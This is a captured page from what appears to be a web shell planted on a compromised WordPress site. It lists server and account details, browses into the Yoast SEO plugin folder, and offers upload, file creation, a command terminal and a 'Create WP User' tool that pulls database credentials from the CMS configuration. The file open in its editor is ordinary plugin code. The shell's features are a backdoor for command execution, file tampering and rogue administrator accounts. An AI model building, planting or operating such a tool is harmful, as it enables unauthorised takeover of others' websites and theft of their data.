Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
www
/
wordpress
/
wpn_budomat
/
wp-content
/
plugins
/
wordpress-seo
/
admin
/
views
/
tabs
/
social
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
accounts.php
3.88 KB
-rw-r--r--
2021-05-10 22:53
facebook.php
3.81 KB
-rw-r--r--
2021-05-10 22:53
pinterest.php
1.12 KB
-rw-r--r--
2021-05-10 22:53
twitterbox.php
1.12 KB
-rw-r--r--
2021-05-10 22:53
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
twitterbox.php
<?php /** * WPSEO plugin file. * * @package WPSEO\Admin\Views * * @uses Yoast_Form $yform Form object. * @uses array WPSEO_Option_Social::$twitter_card_types */ if ( ! defined( 'WPSEO_VERSION' ) ) { header( 'Status: 403 Forbidden' ); header( 'HTTP/1.1 403 Forbidden' ); exit(); } echo '<h2>' . esc_html__( 'Twitter settings', 'wordpress-seo' ) . '</h2>'; printf( '<p>%s</p>', esc_html__( 'Twitter uses Open Graph metadata just like Facebook, so be sure to keep the "Add Open Graph meta data" setting on the Facebook tab enabled if you want to optimize your site for Twitter.', 'wordpress-seo' ) ); $yform->light_switch( 'twitter', __( 'Add Twitter card meta data', 'wordpress-seo' ), [], true, '', true ); echo '<p>'; esc_html_e( 'Enable this feature if you want Twitter to display a preview with images and a text excerpt when a link to your site is shared.', 'wordpress-seo' ); echo '</p>'; echo '<br />'; $yform->select( 'twitter_card_type', __( 'The default card type to use', 'wordpress-seo' ), WPSEO_Option_Social::$twitter_card_types ); do_action( 'wpseo_admin_twitter_section' );
关闭
保存